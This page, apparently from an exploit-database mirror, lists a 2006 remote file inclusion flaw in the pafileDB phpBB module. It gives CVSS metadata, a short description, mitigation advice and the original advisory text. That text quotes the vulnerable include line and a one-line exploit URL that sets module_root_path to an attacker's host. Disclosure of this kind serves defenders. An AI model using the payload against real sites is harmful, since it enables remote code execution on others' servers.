header-logo
Suggest Exploit
vendor:
pafileDB
by:
Darkfire and IR4DEX GROUP
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: pafileDB
Affected Version From: not specified
Affected Version To: not specified
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PafileDB Remote File Inclusion[phpBB]

A remote file inclusion vulnerability exists in the pafiledb_constants.php script of pafileDB. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in any file operations.
Source

Exploit-DB raw data:

# PafileDB Remote File Inclusion[phpBB]
#
# Contact : irc.gigachat.net #ir4dex & darkfire@f4kelive.zzn.com
# Risk : High
# Class : Remote
# Script : pafileDB
# Version : not specified

---------------------------------------------------------------------

Vulnerable code :

$link_language = 'lang_english';
    include( $module_root_path . 'language/' . $link_language . '/lang_pafiledb.' . $phpEx );
---------------------------------------------------------------------

http://www.site.com/[phpBBpath]/[pafiledbpath]/includes/pafiledb_constants.php?module_root_path=http://[attacker]

by Darkfire and IR4DEX GROUP
Greetz: Smurf_RedHat :: V0lks

# milw0rm.com [2006-05-09]

Navigation

Suggest Exploit

Services By CQR